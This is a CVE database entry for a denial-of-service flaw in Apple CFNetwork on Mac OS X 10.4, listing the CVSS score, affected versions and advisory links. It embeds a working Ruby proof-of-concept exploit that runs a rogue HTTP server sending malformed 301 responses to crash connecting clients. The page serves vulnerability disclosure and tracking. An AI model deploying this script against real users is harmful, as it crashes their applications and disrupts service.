CVE-2007-0464 : Detail

CVE-2007-0464

Overflow
38.34%V4
Network
2007-01-30
16h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The _CFNetConnectionWillEnqueueRequests function in CFNetwork 129.19 on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of service (application crash) via a crafted HTTP 301 response, which results in a NULL pointer dereference.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3200

Publication date : 2007-01-24 23h00 +00:00
Author : MoAB
EDB Verified : Yes

#!/usr/bin/ruby # (c) Copyright 2007 Lance M. Havok <lmh [at] info-pull.com> # Proof of concept for MOAB-25-01-2007. # require 'socket' web_port = (ARGV[0] || 80).to_i puts "++ Starting HTTP server at port #{web_port}." web_server = TCPServer.new(nil, web_port) while (session = web_server.accept) rand_clen = rand(80) useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].chomp! puts "++ Connected: #{useragent}" session.print "HTTP/1.1 301 OK\r\n" session.print "Content-Type: text/html\r\n" session.print "Content-Length: #{rand_clen}\r\n" session.print "Location: http://nonexistent123\r\n\r\n" session.print "X" * rand_clen session.close end # milw0rm.com [2007-01-25]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.4

Apple>>Mac_os_x >> Version 10.4.1

Apple>>Mac_os_x >> Version 10.4.2

Apple>>Mac_os_x >> Version 10.4.3

Apple>>Mac_os_x >> Version 10.4.4

Apple>>Mac_os_x >> Version 10.4.5

Apple>>Mac_os_x >> Version 10.4.6

Apple>>Mac_os_x >> Version 10.4.7

Apple>>Mac_os_x >> Version 10.4.8

Apple>>Mac_os_x >> Version 10.4.9

Apple>>Mac_os_x >> Version 10.4.10

Cfnetwork>>Cfnetwork >> Version 129.19

    References

    http://www.securityfocus.com/bid/26444
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/3200
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2007/3868
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.osvdb.org/32704
    Tags : vdb-entry, x_refsource_OSVDB
    http://secunia.com/advisories/27643
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/22249
    Tags : vdb-entry, x_refsource_BID
    http://www.us-cert.gov/cas/techalerts/TA07-319A.html
    Tags : third-party-advisory, x_refsource_CERT